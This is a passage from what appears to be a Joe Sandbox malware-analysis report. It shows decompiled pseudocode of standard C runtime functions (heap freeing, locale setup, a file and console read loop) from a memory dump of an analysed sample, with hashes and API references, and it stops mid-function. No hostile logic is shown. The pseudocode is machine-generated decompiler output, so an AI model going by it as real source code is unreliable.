                0x00eb845a
                0x00eb845f
                0x00eb8460
                0x00eb8463
                0x00eb8469
                0x00eb846c
                0x00eb8471
                0x00eb8472
                0x00eb8475
                0x00eb847b
                0x00eb847e
                0x00eb8483
                0x00eb8484
                0x00eb8487
                0x00eb848d
                0x00eb8490
                0x00eb8495
                0x00eb8496
                0x00eb8499
                0x00eb849f
                0x00eb84a2
                0x00eb84a7
                0x00eb84a8
                0x00eb84ab
                0x00eb84b1
                0x00eb84b4
                0x00eb84b9
                0x00eb84ba
                0x00eb84bd
                0x00eb84c3
                0x00eb84c6
                0x00eb84cb
                0x00eb84cc
                0x00eb84cf
                0x00eb84d5
                0x00eb84d8
                0x00eb84dd
                0x00eb84de
                0x00eb84e1
                0x00eb84e7
                0x00eb84ea
                0x00eb84ef
                0x00eb84f0
                0x00eb84f3
                0x00eb84f9
                0x00eb84fc
                0x00eb8501
                0x00eb8502
                0x00eb8505
                0x00eb850b
                0x00eb850e
                0x00eb8513
                0x00eb8514
                0x00eb8514
                0x00eb8517
                0x00eb851d
                0x00000000
                0x00eb8525
                0x00eb851d
                0x00eb8528

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: f5bf2d46b85f0bab3dd989ce622e6063782c6cadf7c115a5c54b7d68588bb4f1
                • Instruction ID: d86f6136d34f35263c62f8e6885103ebc235d3aae55e4d4c0ecb822de8d8c90d
                • Opcode Fuzzy Hash: f5bf2d46b85f0bab3dd989ce622e6063782c6cadf7c115a5c54b7d68588bb4f1
                • Instruction Fuzzy Hash: 35214B32940204AFC224EB69EA82C9B33EDAF003543A46D18F255F7771CE35FC848A25
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB7973 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 77%
                			E00EB7973(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E00EB2280(8, 1);
					if(_t42 != 0) {
						_t12 = E00EB2280(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00EB2280(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E00EB7488( *_t42, 0xece800);
								_t15 = E00EB7D73(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E00EB2248();
									E00EB4248( *_t42);
									E00EB40EE( *_t42);
									E00EB2248(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00EB48E9(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E00EB2248( *_t42);
							E00EB2248(_t42);
							L8:
							goto L3;
						}
						E00EB2248(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00EAF100())) = 0xc;
					goto L4;
				}
			}











                0x00eb797c
                0x00eb79a2
                0x00000000
                0x00eb7984
                0x00eb798f
                0x00eb7995
                0x00eb79ae
                0x00eb79b3
                0x00eb79b7
                0x00eb79b9
                0x00eb79ca
                0x00eb79cf
                0x00eb79d4
                0x00eb79d6
                0x00eb79ef
                0x00eb79fc
                0x00eb7a04
                0x00eb7a07
                0x00eb7a09
                0x00eb7a1e
                0x00eb7a1e
                0x00eb7a25
                0x00eb7a2c
                0x00eb7a32
                0x00eb7a3a
                0x00eb7a43
                0x00000000
                0x00eb7a43
                0x00eb7a0d
                0x00eb7a10
                0x00eb7a17
                0x00eb7a19
                0x00eb7a41
                0x00000000
                0x00eb7a41
                0x00eb7a1b
                0x00000000
                0x00eb7a1b
                0x00eb79da
                0x00eb79e0
                0x00eb79c1
                0x00000000
                0x00eb79c1
                0x00eb79bc
                0x00000000
                0x00eb79bc
                0x00eb7997
                0x00eb799c
                0x00000000
                0x00eb799c

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 1503006713-0
                • Opcode ID: 0022b19fb101386713e5596c7b34828b6358e67d5e0f62417ca998e91ecbffc4
                • Instruction ID: 82d4e0dbc25873a375edb683a063a90e7f3d2b736cacafff5ce311300eef1a2b
                • Opcode Fuzzy Hash: 0022b19fb101386713e5596c7b34828b6358e67d5e0f62417ca998e91ecbffc4
                • Instruction Fuzzy Hash: 7321F63554D601EAEB263F64DC02EDB7BD4DFC1750B21642DF6C4B58B2EA3199009691
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA5135 Relevance: 18.1, APIs: 12, Instructions: 87COMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E00EA5135(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t13;
				void* _t23;
				void* _t24;
				void* _t26;
				intOrPtr* _t27;
				signed int _t28;
				signed int _t29;

				_t13 = __ebx;
				asm("adc eax, 0xec70fc");
				asm("int3");
				__imp__DecodePointer( *0xed0110, _t23, _t26);
				_t27 =  *0xecf20c; // 0x0
				_t24 = __eax;
				if(_t27 != 0) {
					while( *_t27 != 0) {
						E00EB2248( *_t27);
						_t27 = _t27 + 4;
						if(_t27 != 0) {
							continue;
						}
						break;
					}
					_t27 =  *0xecf20c; // 0x0
				}
				_push(_t13);
				E00EB2248(_t27);
				_t28 =  *0xecf208; // 0x0
				 *0xecf20c = 0;
				if(_t28 != 0) {
					while( *_t28 != 0) {
						E00EB2248( *_t28);
						_t28 = _t28 + 4;
						if(_t28 != 0) {
							continue;
						}
						break;
					}
					_t28 =  *0xecf208; // 0x0
				}
				E00EB2248(_t28);
				 *0xecf208 = 0;
				E00EB2248( *0xecf204);
				_t5 = E00EB2248( *0xecf200);
				_t29 = _t28 | 0xffffffff;
				 *0xecf204 = 0;
				 *0xecf200 = 0;
				if(_t24 != _t29 &&  *0xed0110 != 0) {
					_t5 = E00EB2248(_t24);
				}
				__imp__EncodePointer(_t29);
				 *0xed0110 = _t5;
				_t6 =  *0xecfd10; // 0x0
				if(_t6 != 0) {
					E00EB2248(_t6);
					 *0xecfd10 = 0;
				}
				_t7 =  *0xecfd14; // 0x0
				if(_t7 != 0) {
					E00EB2248(_t7);
					 *0xecfd14 = 0;
				}
				_t8 =  *0xececec; // 0xeceac8
				asm("lock xadd [eax], esi");
				if(_t29 == 1) {
					_t8 =  *0xececec; // 0xeceac8
					if(_t8 != 0xeceac8) {
						_t8 = E00EB2248(_t8);
						 *0xececec = 0xeceac8;
					}
				}
				return _t8;
			}














                0x00ea5135
                0x00eb090d
                0x00eb0912
                0x00eb091b
                0x00eb0921
                0x00eb0927
                0x00eb092b
                0x00eb092d
                0x00eb0934
                0x00eb093a
                0x00eb093d
                0x00000000
                0x00000000
                0x00000000
                0x00eb093d
                0x00eb093f
                0x00eb093f
                0x00eb0945
                0x00eb0947
                0x00eb094c
                0x00eb0954
                0x00eb095d
                0x00eb095f
                0x00eb0965
                0x00eb096b
                0x00eb096e
                0x00000000
                0x00000000
                0x00000000
                0x00eb096e
                0x00eb0970
                0x00eb0970
                0x00eb0977
                0x00eb0982
                0x00eb0988
                0x00eb0993
                0x00eb0998
                0x00eb099b
                0x00eb09a4
                0x00eb09ac
                0x00eb09b7
                0x00eb09bc
                0x00eb09be
                0x00eb09c4
                0x00eb09c9
                0x00eb09d0
                0x00eb09d3
                0x00eb09d9
                0x00eb09d9
                0x00eb09df
                0x00eb09e6
                0x00eb09e9
                0x00eb09ef
                0x00eb09ef
                0x00eb09f5
                0x00eb09fa
                0x00eb0a00
                0x00eb0a02
                0x00eb0a0e
                0x00eb0a11
                0x00eb0a17
                0x00eb0a17
                0x00eb0a0e
                0x00eb0a1f

                APIs
                • DecodePointer.KERNEL32 ref: 00EB091B
                • _free.LIBCMT ref: 00EB0934
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB0947
                • _free.LIBCMT ref: 00EB0965
                • _free.LIBCMT ref: 00EB0977
                • _free.LIBCMT ref: 00EB0988
                • _free.LIBCMT ref: 00EB0993
                • _free.LIBCMT ref: 00EB09B7
                • EncodePointer.KERNEL32(00000000), ref: 00EB09BE
                • _free.LIBCMT ref: 00EB09D3
                • _free.LIBCMT ref: 00EB09E9
                • _free.LIBCMT ref: 00EB0A11
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                • String ID:
                • API String ID: 3064303923-0
                • Opcode ID: 5c34df1f3cd55801a7f99261e5b6b2fbb0ab5ab580c82bd8519dd1f20f667e7c
                • Instruction ID: 40097ca679f4d53ba173fe52876249510fa17ec11c5482e72e5d38763d3a9635
                • Opcode Fuzzy Hash: 5c34df1f3cd55801a7f99261e5b6b2fbb0ab5ab580c82bd8519dd1f20f667e7c
                • Instruction Fuzzy Hash: C0218F76D012118FD7259F16BC41E8B77A5FB817203141A3EFA34B3271CB366C468B81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB7A4A Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 80%
                			E00EB7A4A(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t43;
				signed int _t45;
				signed int _t60;
				void* _t68;
				void* _t71;
				intOrPtr _t77;
				void* _t79;
				intOrPtr* _t81;
				signed int _t82;
				signed int _t85;
				intOrPtr _t87;
				void* _t91;

				_t79 = __edx;
				_push(__ebx);
				_push(__esi);
				_t85 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t81 =  &_a12;
					while(1) {
						_t81 = _t81 + 4;
						_t38 = E00EB56BB(_a4, _a8,  *_t81);
						_t91 = _t91 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t85 = _t85 + 1;
						if(_t85 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00EAEB49(0, _t79);
					asm("int3");
					_push(0x14);
					_push(0xecc560);
					E00EAF1E0(0, _t81, _t85);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(_a4 <= 5) {
						_t87 = E00EB0595();
						_v36 = _t87;
						E00EB42E8(0, _t79, _t81, _t87, __eflags);
						 *(_t87 + 0x70) =  *(_t87 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t43 = E00EB2280(0xb8, 1);
						_pop(_t68);
						_t82 = _t43;
						_v40 = _t82;
						__eflags = _t82;
						if(_t82 != 0) {
							E00EB20A9(_t68, 0xc);
							_v8 = 1;
							E00EB7488(_t82,  *((intOrPtr*)(_t87 + 0x6c)));
							_pop(_t71);
							_v8 = _v8 & 0x00000000;
							E00EB7BBF();
							_t66 = E00EB7D73(0, _t79, _t82, _t87, _t82, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E00EB4248(_t82);
								_t43 = E00EB40EE(_t82);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00EBDB28(_a8, 0xece694);
									_pop(_t71);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0xed0050 = 1;
									}
								}
								E00EB20A9(_t71, 0xc);
								_v8 = 2;
								_t25 = _t87 + 0x6c; // 0x6c
								E00EB4368(_t25, _t82);
								E00EB4248(_t82);
								__eflags =  *(_t87 + 0x70) & 0x00000002;
								if(( *(_t87 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0xecee10 & 0x00000001;
									if(( *0xecee10 & 0x00000001) == 0) {
										E00EB4368(0xece7fc,  *((intOrPtr*)(_t87 + 0x6c)));
										_t77 =  *0xece7fc; // 0xece800
										_t32 = _t77 + 0x84; // 0xecee28
										 *0xecee20 =  *_t32;
										_t33 = _t77 + 0x90; // 0xec8760
										 *0xecee7c =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0xece690 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00EB7BCE();
							}
						}
						_v8 = 0xfffffffe;
						E00EB7C01(_t43, _t87);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00EAF100())) = 0x16;
						E00EAEB1E();
						_t45 = 0;
					}
					return E00EAF225(_t45);
				}
				L20:
			}




















                0x00eb7a4a
                0x00eb7a4d
                0x00eb7a50
                0x00eb7a51
                0x00eb7a56
                0x00eb7a7a
                0x00eb7a7d
                0x00eb7a58
                0x00eb7a58
                0x00eb7a59
                0x00eb7a5c
                0x00eb7a5c
                0x00eb7a67
                0x00eb7a6c
                0x00eb7a71
                0x00000000
                0x00000000
                0x00eb7a73
                0x00eb7a77
                0x00000000
                0x00eb7a79
                0x00000000
                0x00eb7a79
                0x00000000
                0x00eb7a77
                0x00eb7a7e
                0x00eb7a7f
                0x00eb7a80
                0x00eb7a81
                0x00eb7a82
                0x00eb7a83
                0x00eb7a88
                0x00eb7a89
                0x00eb7a8b
                0x00eb7a90
                0x00eb7a95
                0x00eb7a97
                0x00eb7a9a
                0x00eb7a9e
                0x00eb7abc
                0x00eb7abe
                0x00eb7ac1
                0x00eb7ac6
                0x00eb7aca
                0x00eb7ad4
                0x00eb7ada
                0x00eb7adb
                0x00eb7add
                0x00eb7ae0
                0x00eb7ae2
                0x00eb7aea
                0x00eb7af0
                0x00eb7afb
                0x00eb7b01
                0x00eb7b02
                0x00eb7b06
                0x00eb7b1a
                0x00eb7b1c
                0x00eb7b1f
                0x00eb7b21
                0x00eb7bda
                0x00eb7be0
                0x00eb7b27
                0x00eb7b27
                0x00eb7b2b
                0x00eb7b35
                0x00eb7b3b
                0x00eb7b3c
                0x00eb7b3e
                0x00eb7b40
                0x00eb7b40
                0x00eb7b3e
                0x00eb7b4c
                0x00eb7b52
                0x00eb7b59
                0x00eb7b5e
                0x00eb7b64
                0x00eb7b6c
                0x00eb7b70
                0x00eb7b72
                0x00eb7b79
                0x00eb7b83
                0x00eb7b8a
                0x00eb7b90
                0x00eb7b96
                0x00eb7b9b
                0x00eb7ba1
                0x00eb7ba6
                0x00eb7ba9
                0x00eb7ba9
                0x00eb7b79
                0x00eb7bae
                0x00eb7bb2
                0x00eb7bb2
                0x00eb7b21
                0x00eb7be7
                0x00eb7bee
                0x00eb7bf3
                0x00eb7aa0
                0x00eb7aa5
                0x00eb7aab
                0x00eb7ab0
                0x00eb7ab0
                0x00eb7bfa
                0x00eb7bfa
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock
                • String ID:
                • API String ID: 3761839796-0
                • Opcode ID: 0556587309c4ec78ddf18c2651d575d65343c675548cc90777be7f85768d9d39
                • Instruction ID: 97ed45ac5066e8c087459026b5ba92eba88f7f01439dfcbd38624b984c597cf8
                • Opcode Fuzzy Hash: 0556587309c4ec78ddf18c2651d575d65343c675548cc90777be7f85768d9d39
                • Instruction Fuzzy Hash: CD412772508309AFCB10AFA4EC82BDF77E5EF88314F10652DF944BA692DB729541CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA289A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124COMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E00EA289A(signed int __ebx, signed int __ecx, intOrPtr __edx, signed int __esi) {
				signed char _t250;
				void* _t252;
				signed char _t254;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t260;
				void* _t261;
				void* _t262;
				signed int _t263;
				signed int _t265;
				long _t266;
				intOrPtr _t268;
				signed char _t272;
				signed char _t273;
				signed int _t274;
				signed int _t275;
				signed char _t276;
				signed int _t284;
				intOrPtr _t285;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t290;
				signed int _t294;
				void* _t295;
				signed int _t299;
				intOrPtr _t301;
				void* _t303;
				signed char _t304;
				long _t305;
				signed char _t306;
				signed int _t307;
				signed int _t309;
				signed int _t320;
				char _t321;
				char _t322;
				signed int _t324;
				void* _t325;
				signed char _t326;
				signed int _t334;
				intOrPtr _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				signed int _t341;
				long _t342;
				void* _t343;
				long _t345;
				void _t353;
				void _t356;
				signed int _t362;
				signed int _t364;
				intOrPtr _t365;
				signed int _t366;
				void* _t367;
				intOrPtr _t369;
				signed int _t370;
				signed int _t375;
				long _t376;
				void* _t377;
				intOrPtr _t378;
				char _t381;
				signed int _t383;
				void* _t384;
				intOrPtr _t385;
				signed int _t387;
				void* _t390;
				intOrPtr _t391;
				intOrPtr _t394;
				char _t395;
				intOrPtr _t396;
				intOrPtr _t397;
				signed int _t398;
				void* _t399;
				void* _t400;
				void* _t401;
				signed int _t403;
				void _t405;
				void* _t406;
				void* _t407;
				signed int _t409;
				signed short* _t412;
				signed int _t413;
				void* _t416;
				char* _t418;
				long _t419;
				signed int _t423;
				intOrPtr _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed char* _t428;
				int _t429;
				signed int _t430;
				void* _t432;
				void* _t434;

				_t421 = __esi;
				_t396 = __edx;
				_t366 = __ecx;
				_t362 = __ebx;
				_t250 =  *((intOrPtr*)(__edx + __ebx + 0x24)) +  *((intOrPtr*)(__edx + __ebx + 0x24)) >> 1;
				 *(_t432 + 0x13) = _t250;
				_t252 = _t250 - 1;
				if(_t252 == 0) {
					_t254 =  !__esi;
					__eflags = _t254 & 0x00000001;
					if((_t254 & 0x00000001) == 0) {
						goto L2;
					} else {
						_t421 = __esi >> 1;
						__eflags = _t421 - 4;
						if(_t421 < 4) {
							_t421 = 4;
						}
						_t259 = E00EB22C8(_t366, _t396, _t421);
						 *(_t432 - 0x10) = _t259;
						_pop(_t367);
						__eflags = _t259;
						if(__eflags != 0) {
							_t260 = L00EB3F56(_t367, __eflags,  *((intOrPtr*)(_t432 + 8)), 0, 0, 1);
							_t434 = _t434 + 0x10;
							_t369 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
							 *((intOrPtr*)(_t369 + _t362 + 0x28)) = _t260;
							_t17 = _t432 - 0x10; // 0xeb2b47
							_t261 =  *_t17;
							 *((intOrPtr*)(_t369 + _t362 + 0x2c)) = _t396;
							_t366 =  *(_t432 - 0xc);
							goto L14;
						} else {
							 *((intOrPtr*)(E00EAF100())) = 0xc;
							_t257 = E00EAF0CC();
							 *_t257 = 8;
							goto L161;
						}
					}
				} else {
					if(_t252 != 1) {
						L7:
						_t261 =  *(_t432 + 0xc);
						 *(_t432 - 0x10) = _t261;
						L14:
						_t397 =  *((intOrPtr*)(0xecf230 + _t366 * 4));
						_t370 =  *(_t432 - 0xc);
						 *(_t432 - 0x1c) = _t261;
						if(( *(_t397 + _t362 + 4) & 0x00000048) != 0) {
							_t405 =  *((intOrPtr*)(_t397 + _t362 + 5));
							if(_t405 != 0xa && _t421 != 0) {
								 *_t261 = _t405;
								_t406 = _t261 + 1;
								_t409 = 1;
								_t421 = _t421 - 1;
								 *(_t432 - 0x1c) = _t406;
								 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 5)) = 0xa;
								if( *(_t432 + 0x13) != 0) {
									_t353 =  *((intOrPtr*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x25));
									if(_t353 != 0xa && _t421 != 0) {
										 *_t406 = _t353;
										_t407 = _t406 + 1;
										_t421 = _t421 - 1;
										 *(_t432 - 0x1c) = _t407;
										_t409 = 2;
										 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x25)) = 0xa;
										if( *(_t432 + 0x13) == 1) {
											_t356 =  *((intOrPtr*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x26));
											if(_t356 != 0xa && _t421 != 0) {
												 *_t407 = _t356;
												_t421 = _t421 - 1;
												_t409 = 3;
												_t395 = 0xa;
												 *(_t432 - 0x1c) = _t407 + 1;
												 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x26)) = _t395;
											}
										}
									}
								}
							}
						}
						_t262 = E00EB3924( *((intOrPtr*)(_t432 + 8)));
						_t263 =  *(_t432 - 0xc);
						if(_t262 == 0) {
							L35:
							_t265 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t263 * 4)) + _t362),  *(_t432 - 0x1c), _t421, _t432 - 0x14, 0);
							__eflags = _t265;
							if(_t265 == 0) {
								L156:
								_t266 = GetLastError();
								_t423 = 5;
								__eflags = _t266 - _t423;
								if(_t266 != _t423) {
									__eflags = _t266 - 0x6d;
									if(_t266 != 0x6d) {
										goto L30;
									}
									_t364 = 0;
									goto L32;
								}
								 *((intOrPtr*)(E00EAF100())) = 9;
								 *(E00EAF0CC()) = _t423;
								goto L31;
							}
							_t375 =  *(_t432 - 0x14);
							__eflags = _t375;
							if(_t375 < 0) {
								goto L156;
							}
							__eflags = _t375 - _t421;
							if(_t375 > _t421) {
								goto L156;
							}
							goto L38;
						} else {
							_t394 =  *((intOrPtr*)(0xecf230 + _t263 * 4));
							if(( *(_t394 + _t362 + 4) & 0x00000080) == 0) {
								goto L35;
							}
							_t345 = GetConsoleMode( *(_t394 + _t362), _t432 - 0x20);
							 *(_t432 - 0x20) = _t345;
							if(_t345 == 0 ||  *(_t432 + 0x13) != 2) {
								_t263 =  *(_t432 - 0xc);
								goto L35;
							} else {
								if(ReadConsoleW( *( *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4)) + _t362),  *(_t432 - 0x1c), _t421 >> 1, _t432 - 0x14, 0) != 0) {
									_t375 =  *(_t432 - 0x14) +  *(_t432 - 0x14);
									 *(_t432 - 0x14) = _t375;
									L38:
									_t398 =  *(_t432 - 0xc);
									_t409 = _t409 + _t375;
									_t424 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
									_t272 =  *(_t424 + _t362 + 4);
									__eflags = _t272;
									if(_t272 >= 0) {
										L98:
										_t172 = _t432 - 0x10; // 0xeb2b47
										_t268 =  *_t172;
										L99:
										_t364 =  *(_t432 - 0x18);
										L100:
										if(_t268 !=  *(_t432 + 0xc)) {
											E00EB2248(_t268);
										}
										if(_t364 != 0xfffffffe) {
											_t409 = _t364;
										}
										_t258 = _t409;
										L162:
										return _t258;
									}
									__eflags =  *(_t432 + 0x13) - 2;
									if( *(_t432 + 0x13) == 2) {
										__eflags =  *(_t432 - 0x20);
										if( *(_t432 - 0x20) == 0) {
											__eflags = _t375;
											if(_t375 == 0) {
												L123:
												_t273 = _t272 & 0x000000fb;
												__eflags = _t273;
												L124:
												 *(_t424 + _t362 + 4) = _t273;
												_t194 = _t432 - 0x10; // 0xeb2b47
												_t274 =  *_t194;
												_t425 = _t274;
												 *(_t432 - 0x28) = _t274;
												_t376 = _t274 + _t409;
												 *(_t432 - 0x20) = _t376;
												__eflags = _t274 - _t376;
												if(_t274 >= _t376) {
													L155:
													_t246 = _t432 - 0x10; // 0xeb2b47
													_t268 =  *_t246;
													_t409 = _t425 - _t268;
													goto L99;
												}
												_t377 = 0xd;
												 *((intOrPtr*)(_t432 + 0x10)) = 0x1a;
												_t412 = _t274;
												while(1) {
													_t275 =  *_t412 & 0x0000ffff;
													__eflags = _t275 -  *((intOrPtr*)(_t432 + 0x10));
													if(_t275 ==  *((intOrPtr*)(_t432 + 0x10))) {
														break;
													}
													__eflags = _t275 - _t377;
													if(_t275 == _t377) {
														__eflags = _t412 -  *(_t432 - 0x20) + 0xfffffffe;
														if(_t412 >=  *(_t432 - 0x20) + 0xfffffffe) {
															_t412 =  &(_t412[1]);
															_t284 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362), _t432 - 8, 2, _t432 - 0x14, 0);
															__eflags = _t284;
															if(_t284 != 0) {
																L136:
																__eflags =  *(_t432 - 0x14);
																if( *(_t432 - 0x14) == 0) {
																	L151:
																	_t398 =  *(_t432 - 0xc);
																	_t377 = 0xd;
																	 *_t425 = _t377;
																	_t425 = _t425 + 2;
																	L143:
																	__eflags = _t412 -  *(_t432 - 0x20);
																	if(_t412 <  *(_t432 - 0x20)) {
																		continue;
																	}
																	goto L155;
																}
																_t398 =  *(_t432 - 0xc);
																_t285 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
																__eflags =  *(_t285 + _t362 + 4) & 0x00000048;
																if(( *(_t285 + _t362 + 4) & 0x00000048) == 0) {
																	__eflags = _t425 -  *(_t432 - 0x10);
																	if(__eflags != 0) {
																		L148:
																		L00EB3F56(_t377, __eflags,  *((intOrPtr*)(_t432 + 8)), 0xfffffffe, 0xffffffff, 1);
																		_t398 =  *(_t432 - 0xc);
																		_t434 = _t434 + 0x10;
																		_t287 = 0xa;
																		__eflags =  *(_t432 - 8) - _t287;
																		if( *(_t432 - 8) == _t287) {
																			L141:
																			_push(0xd);
																			L142:
																			_pop(_t377);
																			goto L143;
																		}
																		_t377 = 0xd;
																		 *_t425 = _t377;
																		L150:
																		_t425 = _t425 + 2;
																		goto L143;
																	}
																	_t288 = 0xa;
																	__eflags =  *(_t432 - 8) - _t288;
																	if(__eflags != 0) {
																		goto L148;
																	}
																	 *_t425 = _t288;
																	_t425 = _t425 + 2;
																	goto L141;
																}
																_t289 = 0xa;
																_push(0xd);
																__eflags =  *(_t432 - 8) - _t289;
																if( *(_t432 - 8) != _t289) {
																	_pop(_t290);
																	 *_t425 = _t290;
																	_t425 = _t425 + 2;
																	__eflags = _t425;
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 5)) =  *(_t432 - 8);
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 0x25)) =  *((intOrPtr*)(_t432 - 7));
																	_t381 = 0xa;
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 0x26)) = _t381;
																	goto L141;
																}
																 *_t425 = _t289;
																_t425 = _t425 + 2;
																goto L142;
															}
															_t294 = GetLastError();
															__eflags = _t294;
															if(_t294 != 0) {
																goto L151;
															}
															goto L136;
														}
														_t399 = 0xa;
														__eflags = _t412[1] - _t399;
